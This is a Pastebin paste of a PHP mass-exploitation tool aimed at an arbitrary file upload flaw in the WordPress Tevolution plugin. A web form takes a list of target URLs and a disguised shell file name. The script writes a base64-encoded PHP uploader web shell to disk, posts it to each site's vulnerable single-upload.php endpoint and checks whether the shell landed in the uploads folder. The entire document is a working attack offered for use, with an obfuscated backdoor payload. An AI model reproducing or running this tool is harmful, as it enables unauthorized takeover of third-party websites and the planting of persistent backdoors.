AgusSR

WordPress Plugins Tevolution Mass Xploiter

May 8th, 2016
3,118
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <center>
  3. <form method="post" enctype="multipart/form-data">
  4. Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php.xxxjpg' required><br>
  5. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
  6. <input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
  7. </form>
  8. <?php
  9. // IndoXploit
  10. set_time_limit(0);
  11. error_reporting(0);
  12.  
  13. function buffer() {
  14.     ob_flush();
  15.     flush();
  16. }
  17. function curl($url, $payload) {
  18.     $ch = curl_init();
  19.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  20.           curl_setopt($ch, CURLOPT_URL, $url);
  21.           curl_setopt($ch, CURLOPT_POST, true);
  22.           curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  23.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  24.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  25.           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  26.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  27.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  28.           curl_setopt($ch, CURLOPT_HEADER, 0);
  29.           curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  30.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  31.     $res = curl_exec($ch);
  32.           curl_close($ch);
  33.     return $res;
  34. }
  35. $file = htmlspecialchars($_POST['filename']);
  36. $site = explode("\r\n", $_POST['url']);
  37. $do = $_POST['exp'];
  38. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  39. if($do) {
  40.     $y = date("Y");
  41.     $m = date("m");
  42.     $idx_dir = mkdir("indoxploit_tools", 0755);
  43.     $shell = "indoxploit_tools/".$file;
  44.     $fopen = fopen($shell, "w");
  45.     fwrite($fopen, $uploader);
  46.     fclose($fopen);
  47.     foreach($site as $url) {
  48.         $target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
  49.         $cek_shell = "$url/wp-content/uploads/$y/$m/$file";
  50.         $data = array(
  51.             "Filedata" => "@$shell"
  52.             );
  53.         $curl = curl($target, $data);
  54.         if($curl) {
  55.             $cek = file_get_contents($cek_shell);
  56.             if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
  57.                 echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
  58.             }
  59.         }
  60.     buffer();
  61.     }
  62. }
  63. ?>
RAW Paste Data